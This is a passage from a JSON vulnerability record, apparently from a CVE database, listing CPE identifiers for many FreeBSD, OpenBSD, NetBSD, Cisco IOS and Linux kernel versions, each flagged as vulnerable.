                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:6.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:openbsd:openbsd:3.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(13\\)wt6\\(1\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(5a\\)e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(2\\)xf5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(11\\)e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(3a\\)t7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(3\\)xi:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1yd:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1ya:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(15\\)bc1f:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(17d\\)sx:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(4\\)ya11:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2fy:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(23a\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(25\\)sw:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.2\\(15b\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(15\\)s3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(11\\)yf3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(8\\)ja1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3yl:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.3.13:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.3.14:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.11:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.12:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(22\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(5\\)yh:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(13\\)zf:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(14\\)su2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:1.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2sxf:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.2.21:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.3.38:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.21:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.40:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.11.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.11.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.15.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:openbsd:openbsd:2.8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.1\\(22\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.1ct:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.2bc:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(14\\)s8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(16a\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(31\\)s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(5\\)wc13:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0sv:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(14\\)e9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(20\\)sl:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(30\\)s2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(18\\)s5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(20\\)sp1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(28\\)s3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0dc:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(14\\)ea1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(13\\)ay:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(9\\)ex:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(1\\)xd3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(14\\)sy:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(7\\)ec:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(5\\)yf2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1xs:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(13\\)e9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(11b\\)e14:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(4\\)dc:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(15\\)cx:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(15\\)bz:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(20\\)s1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(20\\)ew3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(21a\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2pb:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(5d\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(14\\)t2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2zn:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(20\\)s2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2ja:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(18\\)sw:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(17d\\)sxb8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(18\\)ew5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(27b\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2n:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.1\\(15\\)ca:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(14\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(16\\)st:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(16\\)st1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(21\\)st6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(21\\)st:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(3.6\\)w5\\(9.0.5\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(5\\)wc3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0xq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0xe:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(9\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(1a\\)t1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2sx:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(11\\)yf2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(3h\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.4\\(2\\)mr:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3xg:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.4xj:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.20.13:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.17.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.0.31:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2xe:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(8\\)xy5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.4\\(3b\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.4\\(5b\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(11\\)t8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(14\\)yu1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3yr:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(8\\)yg:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:9.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.13:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.14.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.47:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.35:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(23\\)e4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(6\\)ea2a:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(5\\)xv4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(10\\)da2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(18\\)ew2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(2\\)t1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(4\\)b3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(8\\)tpc10a:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.43:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:6.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:5.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:1.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:3.99.15:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(13a\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(11\\)t4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2zp:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(5a\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.4\\(5\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3xs:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3bw:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.22.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.3.37:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.32:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.13:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:2.2.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:openbsd:openbsd:3.8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(1\\)w:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.1\\(16\\)aa:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.1\\(13\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.3\\(1\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.1ia:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(17a\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(18\\)s7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(15\\)sc:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(26\\)s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(28\\)w5-32a:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0xd:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(8.0.2\\)s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(5\\)xk2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(4\\)xm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(3a\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(8b\\)e18:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(15\\)mc2e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(11\\)ec:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(7a\\)e6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(8a\\)ew1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1xy:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(18\\)s9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(4\\)mb12:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(25\\)fx:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(2\\)xk:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(20\\)eu:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2ca:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.1\\(11\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.2\\(16\\)p:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(1\\)dc:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(10\\)e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(9a\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(20\\)e1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(11\\)yn:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(14\\)yq1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.4\\(4\\)mr:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3xw:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2xj:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(7\\)t8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
